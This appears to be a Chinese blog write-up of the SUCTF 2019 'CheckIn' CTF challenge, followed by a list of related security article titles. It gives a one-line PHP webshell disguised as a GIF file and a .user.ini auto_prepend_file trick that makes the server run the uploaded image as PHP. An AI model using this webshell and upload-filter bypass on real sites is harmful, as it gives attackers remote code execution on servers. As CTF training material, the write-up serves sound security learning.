[SUCTF 2019]CheckIn 1

解题步骤

  1. 上传木马图片,命名为b.php
xml 复制代码
GIF89a
<script language='php'>@eval($_POST['cmd'])</script>
  1. bp抓包,修改数据;然后可看到上传的文件

  2. 上传.user.ini文件,内容编写如下,然后bp抓包修改文件类型

php 复制代码
GIF89a
auto_prepend_file=b.jpg


  1. 可发现,刚刚我们上传的木马b文件被删除了,这里我测试了几遍,只要速度够快,两个文件能够同时存在,能够用蚁剑连接。


相关推荐
一次旅行9 天前
网络安全总结
安全·web安全
一名优秀的码农10 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp10 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp10 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
上海云盾商务经理杨杨10 天前
2025年重大网络安全事件回顾与趋势分析
网络·安全·web安全
岛屿旅人10 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
上海云盾商务经理杨杨10 天前
2026年企业网络安全方向预防预测:在AI工业化时代构建主动免疫体系
人工智能·安全·web安全
努力的lpp10 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
志栋智能10 天前
安全超自动化:从被动防御到主动响应的革命
运维·网络·数据库·人工智能·安全·web安全·自动化
合天网安实验室10 天前
H5渗透实战:从负数金额漏洞到签名绕过
web安全·漏洞挖掘·h5渗透·签名绕过